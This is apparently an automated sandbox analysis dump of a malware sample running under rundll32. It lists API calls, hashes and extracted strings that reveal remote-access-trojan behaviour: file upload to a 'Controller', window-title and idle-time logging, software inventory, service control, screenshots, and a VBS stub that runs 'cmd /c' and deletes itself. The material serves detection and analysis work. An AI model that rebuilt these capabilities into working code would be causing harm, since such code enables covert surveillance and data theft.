                                      • GetLastError.KERNEL32 ref: 02B1C1D0
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                      • String ID: ?
                                      • API String ID: 3941738427-1684325040
                                      • Opcode ID: 861c02aaa2b963255762c9d712dc90a74897bb4c75356d08e3c950415b480477
                                      • Instruction ID: 47e48fba693f075faa6741e6e7a8d755c611215bfb024bebe3ac3b0705690c4d
                                      • Opcode Fuzzy Hash: 861c02aaa2b963255762c9d712dc90a74897bb4c75356d08e3c950415b480477
                                      • Instruction Fuzzy Hash: E841BF71984315ABDB20DF60D84CAAB7BECEB55354F40096BF581C3160EB74C998CBD2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _free$EnvironmentVariable$_wcschr
                                      • String ID:
                                      • API String ID: 3899193279-0
                                      • Opcode ID: c1f4608acb4ce66888f010102b5c32ff9ad463a0266bc5932d0d8383a326026b
                                      • Instruction ID: c5f396036808f9aac3d15f76ae79fb7f9c74d4218b9202223b02b41f1549a015
                                      • Opcode Fuzzy Hash: c1f4608acb4ce66888f010102b5c32ff9ad463a0266bc5932d0d8383a326026b
                                      • Instruction Fuzzy Hash: 83D1F672D00300AFDB25AF7898C0B7977A9EF01354F5845EEEE55A7681EF359A00EB90
                                      APIs
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02B14DD5
                                      • LoadLibraryA.KERNEL32(?), ref: 02B14E17
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02B14E37
                                      • FreeLibrary.KERNEL32(00000000), ref: 02B14E3E
                                      • LoadLibraryA.KERNEL32(?), ref: 02B14E76
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02B14E88
                                      • FreeLibrary.KERNEL32(00000000), ref: 02B14E8F
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 02B14E9E
                                      • FreeLibrary.KERNEL32(00000000), ref: 02B14EB5
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                      • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                      • API String ID: 2490988753-744132762
                                      • Opcode ID: 98c566ae60f3c4b40f900e32a84e1290b8d6eb37e8bda9ceabd3f391b17055fb
                                      • Instruction ID: 96df67a855abefaa1d28b153a4a099083f6f43fd91e73dbd4283c555fc02206c
                                      • Opcode Fuzzy Hash: 98c566ae60f3c4b40f900e32a84e1290b8d6eb37e8bda9ceabd3f391b17055fb
                                      • Instruction Fuzzy Hash: A431E7B3901715ABD320DF64D888E9BBBECEF44784F800A99F99897200D735D9458BE6
                                      APIs
                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 02B1D5DA
                                      • GetCursorPos.USER32(?), ref: 02B1D5E9
                                      • SetForegroundWindow.USER32(?), ref: 02B1D5F2
                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 02B1D60C
                                      • Shell_NotifyIconA.SHELL32(00000002,02B74B48), ref: 02B1D65D
                                      • ExitProcess.KERNEL32 ref: 02B1D665
                                      • CreatePopupMenu.USER32 ref: 02B1D66B
                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 02B1D680
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                      • String ID: Close
                                      • API String ID: 1657328048-3535843008
                                      • Opcode ID: ec397864fe17d755a4e9ce81266b30d7a37d1ae8cac5258696f8b87050bcbdb4
                                      • Instruction ID: fe81beb9c95a7b980a3be75ab2b421ea7b18bdcbde6a2ccfb47c3052d0771be0
                                      • Opcode Fuzzy Hash: ec397864fe17d755a4e9ce81266b30d7a37d1ae8cac5258696f8b87050bcbdb4
                                      • Instruction Fuzzy Hash: 2A214A7598020AEFEB154FA4ED0EB693F75FB08386F444954F6069A0A0D7719D30DB90
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Similarity
                                      • API ID: _free$Info
                                      • String ID:
                                      • API String ID: 2509303402-0
                                      • Opcode ID: 2dc59439f677e320e0e5d65b82b51f895fc31a61d0e7625455878024929f6247
                                      • Instruction ID: 2aeccd9456827a4450416f9c29a8f5f9d433bf6c558e95fcdcd38485c8445c4a
                                      • Opcode Fuzzy Hash: 2dc59439f677e320e0e5d65b82b51f895fc31a61d0e7625455878024929f6247
                                      • Instruction Fuzzy Hash: C8B1BF719003059FDB21DF68C8C0BEEBBF9FF09304F5442A9E9A4A7241DB75A945EB60
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 02B5130A
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B5051F
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B50531
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B50543
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B50555
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B50567
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B50579
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B5058B
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B5059D
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B505AF
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B505C1
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B505D3
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B505E5
                                        • Part of subcall function 02B50502: _free.LIBCMT ref: 02B505F7
                                      • _free.LIBCMT ref: 02B512FF
                                        • Part of subcall function 02B46782: HeapFree.KERNEL32(00000000,00000000,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?), ref: 02B46798
                                        • Part of subcall function 02B46782: GetLastError.KERNEL32(?,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?,?), ref: 02B467AA
                                      • _free.LIBCMT ref: 02B51321
                                      • _free.LIBCMT ref: 02B51336
                                      • _free.LIBCMT ref: 02B51341
                                      • _free.LIBCMT ref: 02B51363
                                      • _free.LIBCMT ref: 02B51376
                                      • _free.LIBCMT ref: 02B51384
                                      • _free.LIBCMT ref: 02B5138F
                                      • _free.LIBCMT ref: 02B513C7
                                      • _free.LIBCMT ref: 02B513CE
                                      • _free.LIBCMT ref: 02B513EB
                                      • _free.LIBCMT ref: 02B51403
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: ec651799f003a733bf98678b91b1ff7a6fef13f9e924d302137bad5bfbca5a71
                                      • Instruction ID: 9f32437effd29a249c8c0b68561d2c46fc0af4ca2dc571102c78f484f100bf5b
                                      • Opcode Fuzzy Hash: ec651799f003a733bf98678b91b1ff7a6fef13f9e924d302137bad5bfbca5a71
                                      • Instruction Fuzzy Hash: 30317831610310AFEF22AE3DD884F5AB7EAEF01315F50C599E968DB550DF70AD809B60
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 02B08CE3
                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 02B08D1B
                                      • __aulldiv.LIBCMT ref: 02B08D4D
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 02B08E70
                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 02B08E8B
                                      • CloseHandle.KERNEL32(00000000), ref: 02B08F64
                                      • CloseHandle.KERNEL32(00000000,00000052), ref: 02B08FAE
                                      • CloseHandle.KERNEL32(00000000), ref: 02B08FFC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                      • API String ID: 3086580692-2596673759
                                      • Opcode ID: b26683f9b7040072ad313d060fda0e0f58748e705e4cbc40715877a4a8616463
                                      • Instruction ID: ddb824623d1a243ae130e49918c3c42e0a33a7b5c1555c667ee131d95a15cea4
                                      • Opcode Fuzzy Hash: b26683f9b7040072ad313d060fda0e0f58748e705e4cbc40715877a4a8616463
                                      • Instruction Fuzzy Hash: 62B17E316083409BD32AEB24C8D4A6FBBE6EF84350F40499DF48A472D0EF759949CF56
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32 ref: 02B1C6F5
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 02B1C726
                                      • RegCloseKey.ADVAPI32(?), ref: 02B1C9BF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnumOpen
                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
                                      • API String ID: 1332880857-3730529168
                                      • Opcode ID: a4e92f971750bea03cc18141fde472709d1e0681e5d3867997a8d22ed3d43a50
                                      • Instruction ID: 18d25046cefc8ac0704215ee737f99ad6ce629056900fae71764672319b8bbc7
                                      • Opcode Fuzzy Hash: a4e92f971750bea03cc18141fde472709d1e0681e5d3867997a8d22ed3d43a50
                                      • Instruction Fuzzy Hash: B06106711183459BD32AEB14D894EEFB7E9BF94304F5049AEE589831A0FF309949CF52
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: a7ff0a224e2c709403702587dffebaea54594644fd6f7b881c11f6071bc6464f
                                      • Instruction ID: 33fdaf85e3e7c3b02a0ca8943869e56243e748b1b8761dd95f5809763a557a89
                                      • Opcode Fuzzy Hash: a7ff0a224e2c709403702587dffebaea54594644fd6f7b881c11f6071bc6464f
                                      • Instruction Fuzzy Hash: B8C14372E41214AFDB20DBA8CC82FEE77F9AB09700F544595FE05EF281D6B09D419BA4
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02B12ACD
                                        • Part of subcall function 02B1B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,02B66468,02B0D20D,.vbs,?,?,?,?,?,02B752F0), ref: 02B1B99F
                                        • Part of subcall function 02B18568: CloseHandle.KERNEL32(02B040F5,?,?,02B040F5,02B65E74), ref: 02B1857E
                                        • Part of subcall function 02B18568: CloseHandle.KERNEL32(02B65E74,?,?,02B040F5,02B65E74), ref: 02B18587
                                      • Sleep.KERNEL32(0000000A,02B65E74), ref: 02B12C1F
                                      • Sleep.KERNEL32(0000000A,02B65E74,02B65E74), ref: 02B12CC1
                                      • Sleep.KERNEL32(0000000A,02B65E74,02B65E74,02B65E74), ref: 02B12D63
                                      • DeleteFileW.KERNEL32(00000000,02B65E74,02B65E74,02B65E74), ref: 02B12DC5
                                      • DeleteFileW.KERNEL32(00000000,02B65E74,02B65E74,02B65E74), ref: 02B12DFC
                                      • DeleteFileW.KERNEL32(00000000,02B65E74,02B65E74,02B65E74), ref: 02B12E38
                                      • Sleep.KERNEL32(000001F4,02B65E74,02B65E74,02B65E74), ref: 02B12E52
                                      • Sleep.KERNEL32(00000064), ref: 02B12E94
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                      • String ID: /stext "
                                      • API String ID: 1223786279-3856184850
                                      • Opcode ID: ce77af032d9e8ebf8983a20fc58c7e7fc8943d783b57a3c9f85fdfc310e988e5
                                      • Instruction ID: 4ece7d05c577823dec80aa98982ec173a94d6839537c71e8d2213bd497aacc5b
                                      • Opcode Fuzzy Hash: ce77af032d9e8ebf8983a20fc58c7e7fc8943d783b57a3c9f85fdfc310e988e5
                                      • Instruction Fuzzy Hash: 7E0244315183808AD32AFB64D8D4AEFBBE6AF94344F90489DE58A471D0EF70994DCF52
                                      APIs
                                        • Part of subcall function 02B558A9: CreateFileW.KERNEL32(00000000,00000000,?,02B55C84,?,?,00000000,?,02B55C84,00000000,0000000C), ref: 02B558C6
                                      • GetLastError.KERNEL32 ref: 02B55CEF
                                      • __dosmaperr.LIBCMT ref: 02B55CF6
                                      • GetFileType.KERNEL32(00000000), ref: 02B55D02
                                      • GetLastError.KERNEL32 ref: 02B55D0C
                                      • __dosmaperr.LIBCMT ref: 02B55D15
                                      • CloseHandle.KERNEL32(00000000), ref: 02B55D35
                                      • CloseHandle.KERNEL32(?), ref: 02B55E7F
                                      • GetLastError.KERNEL32 ref: 02B55EB1
                                      • __dosmaperr.LIBCMT ref: 02B55EB8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: H
                                      • API String ID: 4237864984-2852464175
                                      • Opcode ID: ebb517bff8066d1a848a2e7da4f2747c025c5c515fdee73ee687c5617c81bc52
                                      • Instruction ID: 97e68335363825698eedb9c8b997f39299c6f90f1d6012448e6d015564ad5669
                                      • Opcode Fuzzy Hash: ebb517bff8066d1a848a2e7da4f2747c025c5c515fdee73ee687c5617c81bc52
                                      • Instruction Fuzzy Hash: 8BA13432A142689FDF29AF68DC91BAE7BA1EF06325F14018DEC11DF2D1DB359812CB51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 65535$udp
                                      • API String ID: 0-1267037602
                                      • Opcode ID: 15d06727fb7da973d20bc46b37ec3d15b8aab4a0cc4cfb0badf64f6ccc136be1
                                      • Instruction ID: cc8fb70d5ce1bb8917eaa81e18ecdf8e7be0d5e58802ad7b512110e3a6210baf
                                      • Opcode Fuzzy Hash: 15d06727fb7da973d20bc46b37ec3d15b8aab4a0cc4cfb0badf64f6ccc136be1
                                      • Instruction Fuzzy Hash: 3A5117756057019FDB209F68C908B3B37F4EF84B59F8808ADF89597290DB69CC40CB62
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 02B0AD38
                                      • Sleep.KERNEL32(000001F4), ref: 02B0AD43
                                      • GetForegroundWindow.USER32 ref: 02B0AD49
                                      • GetWindowTextLengthW.USER32(00000000), ref: 02B0AD52
                                      • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 02B0AD86
                                      • Sleep.KERNEL32(000003E8), ref: 02B0AE54
                                        • Part of subcall function 02B0A636: SetEvent.KERNEL32(?,?,00000000,02B0B20A,00000000), ref: 02B0A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                      • String ID: [${ User has been idle for $ minutes }$]
                                      • API String ID: 911427763-3954389425
                                      • Opcode ID: eef050ec4b2025e5f6444e4beea93b442d903857c28a11b8e58ecbdb16f66e1d
                                      • Instruction ID: 7e120fe2490f844810144733bae6d362f4341002d8846d6ee59312b764c9efaf
                                      • Opcode Fuzzy Hash: eef050ec4b2025e5f6444e4beea93b442d903857c28a11b8e58ecbdb16f66e1d
                                      • Instruction Fuzzy Hash: A851D4326043409BD316F734D8C4ABF7FABAB84304F5009E9F596871E0EF249945CE92
                                      APIs
                                        • Part of subcall function 02B12850: TerminateProcess.KERNEL32(00000000,pth_unenc,02B0F8C8), ref: 02B12860
                                        • Part of subcall function 02B12850: WaitForSingleObject.KERNEL32(000000FF), ref: 02B12873
                                        • Part of subcall function 02B136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,02B752F0), ref: 02B13714
                                        • Part of subcall function 02B136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 02B1372D
                                        • Part of subcall function 02B136F8: RegCloseKey.KERNEL32(00000000), ref: 02B13738
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 02B0D859
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02B66468,02B66468,00000000), ref: 02B0D9B8
                                      • ExitProcess.KERNEL32 ref: 02B0D9C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                      • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                      • API String ID: 1913171305-2411266221
                                      • Opcode ID: b518e28b149545766c49d99683d99cbc7361d4efd2eeddd61e4ae941f44ddee4
                                      • Instruction ID: 7d56a1452e1f0132c5d5f191552b4b32515a82c28356c41b2835fd35ccae3123
                                      • Opcode Fuzzy Hash: b518e28b149545766c49d99683d99cbc7361d4efd2eeddd61e4ae941f44ddee4
                                      • Instruction Fuzzy Hash: 32413D319101185ADB1AF7A4DCD4DFEBB7EAF50700F4041E9A50AA70E5FF649E8ACE90
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02B01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02B3A892
                                      • GetLastError.KERNEL32(?,?,02B01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02B3A89F
                                      • __dosmaperr.LIBCMT ref: 02B3A8A6
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02B01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02B3A8D2
                                      • GetLastError.KERNEL32(?,?,?,02B01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02B3A8DC
                                      • __dosmaperr.LIBCMT ref: 02B3A8E3
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,02B01D55,?), ref: 02B3A926
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,02B01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02B3A930
                                      • __dosmaperr.LIBCMT ref: 02B3A937
                                      • _free.LIBCMT ref: 02B3A943
                                      • _free.LIBCMT ref: 02B3A94A
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                      • String ID:
                                      • API String ID: 2441525078-0
                                      • Opcode ID: 9e09f86b68a53da0c47d0a51876e36228bbe7888b8a1bda705b55c76bebfe9d8
                                      • Instruction ID: 4acfce85b1f54fe5d1e3dc8d74d62b80012aa006d6c3f12c838e8d582197e4f5
                                      • Opcode Fuzzy Hash: 9e09f86b68a53da0c47d0a51876e36228bbe7888b8a1bda705b55c76bebfe9d8
                                      • Instruction Fuzzy Hash: 8331B37180420AFFDF12AFA4CC84DAE7B6DEF05364B204695FA506A190DF31D951EBA0
                                      APIs
                                      • SetEvent.KERNEL32(?,?), ref: 02B054BF
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02B0556F
                                      • TranslateMessage.USER32(?), ref: 02B0557E
                                      • DispatchMessageA.USER32(?), ref: 02B05589
                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,02B74F78), ref: 02B05641
                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 02B05679
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                      • API String ID: 2956720200-749203953
                                      • Opcode ID: 5e8cec4f82d709964755841cbc6e8dbe6f2bb828339ce1ca0d544b22f3767181
                                      • Instruction ID: 2599cae86c101aca53983ac9e65e6e08e49a6d669d783796baa9584b0f974b86
                                      • Opcode Fuzzy Hash: 5e8cec4f82d709964755841cbc6e8dbe6f2bb828339ce1ca0d544b22f3767181
                                      • Instruction Fuzzy Hash: F841C432A047019BCB15FB74D8D896F7BBAAB85740F8009ACF956875D0EF348909CF91
                                      APIs
                                      • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 02B13417
                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 02B13425
                                      • GetFileSize.KERNEL32(?,00000000), ref: 02B13432
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 02B13452
                                      • CloseHandle.KERNEL32(00000000), ref: 02B1345F
                                      • CloseHandle.KERNEL32(?), ref: 02B13465
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                      • String ID:
                                      • API String ID: 297527592-0
                                      • Opcode ID: f0a5c40f5eea8838f3a1853eb8d607fca3a9bce8b0b446c35ba30cf482bcf7e3
                                      • Instruction ID: bcd56e368c4bf3b6de20754b836088a45353bc54c862f1cf86baa2db291e2d62
                                      • Opcode Fuzzy Hash: f0a5c40f5eea8838f3a1853eb8d607fca3a9bce8b0b446c35ba30cf482bcf7e3
                                      • Instruction Fuzzy Hash: FB41E231648310BBD7119B25EC49F2B3BECEFC5768F544A99F644D6090EF31C500CA66
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,02B1A486,00000000), ref: 02B1AB1C
                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,02B1A486,00000000), ref: 02B1AB33
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A486,00000000), ref: 02B1AB40
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02B1A486,00000000), ref: 02B1AB4F
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A486,00000000), ref: 02B1AB60
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A486,00000000), ref: 02B1AB63
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 32725a56a5e7eb963b990c1266ee4c321590abfa1e7ed4ec98201f69bf02e2c5
                                      • Instruction ID: 284f08e658d7303556d8df95dc0bd9e5d64d5ed391dd61da2ad764592c34c66c
                                      • Opcode Fuzzy Hash: 32725a56a5e7eb963b990c1266ee4c321590abfa1e7ed4ec98201f69bf02e2c5
                                      • Instruction Fuzzy Hash: 48112171D81628AF9722AB64DCC8EFF3B6CDF426A1B040855F909D7040DB249C06EAF1
                                      APIs
                                      • _free.LIBCMT ref: 02B48135
                                        • Part of subcall function 02B46782: HeapFree.KERNEL32(00000000,00000000,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?), ref: 02B46798
                                        • Part of subcall function 02B46782: GetLastError.KERNEL32(?,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?,?), ref: 02B467AA
                                      • _free.LIBCMT ref: 02B48141
                                      • _free.LIBCMT ref: 02B4814C
                                      • _free.LIBCMT ref: 02B48157
                                      • _free.LIBCMT ref: 02B48162
                                      • _free.LIBCMT ref: 02B4816D
                                      • _free.LIBCMT ref: 02B48178
                                      • _free.LIBCMT ref: 02B48183
                                      • _free.LIBCMT ref: 02B4818E
                                      • _free.LIBCMT ref: 02B4819C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: a1e00b3c150a5edb48f5b5ca5274ec95ae611e2de8b9491c3a9b97bd29a262f8
                                      • Instruction ID: 29c49a7a14b8eaa386862cec57dc2212e1766606c4c319dbf9b3a88d33045ed6
                                      • Opcode Fuzzy Hash: a1e00b3c150a5edb48f5b5ca5274ec95ae611e2de8b9491c3a9b97bd29a262f8
                                      • Instruction Fuzzy Hash: 3111637A510108AFCF02EF94C981CD97BAAFF05355B5141A5BA588F221DA31EF50AFC0
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02B19FB9
                                      • GdiplusStartup.GDIPLUS(02B74ACC,?,00000000), ref: 02B19FEB
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 02B1A077
                                      • Sleep.KERNEL32(000003E8), ref: 02B1A0FD
                                      • GetLocalTime.KERNEL32(?), ref: 02B1A105
                                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 02B1A1F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
